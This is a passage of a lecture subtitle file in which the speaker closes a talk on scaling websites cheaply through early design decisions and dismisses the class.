01:33:36,866 --> 01:33:39,536
that you can scale your
website out without having

2145
01:33:39,536 --> 01:33:41,116
to throw a lot of
money at it, certainly,

2146
01:33:41,346 --> 01:33:43,856
and also without having to
rewrite all of your code.

2147
01:33:43,856 --> 01:33:45,636
There's a number of decisions
you'll be able to make

2148
01:33:45,636 --> 01:33:48,826
up front that, if you are so
lucky as to have a problem

2149
01:33:48,826 --> 01:33:51,356
of scalability, you'll
be able to adapt to it.

2150
01:33:51,886 --> 01:33:53,086
Why don't we adjourn here.

2151
01:33:53,086 --> 01:33:54,546
I'll stick around for
one on one questions,

2152
01:33:54,546 --> 01:33:56,026
otherwise we have
Section coming up,

2153
01:33:56,306 --> 01:33:57,936
and I'll see you guys on Monday.

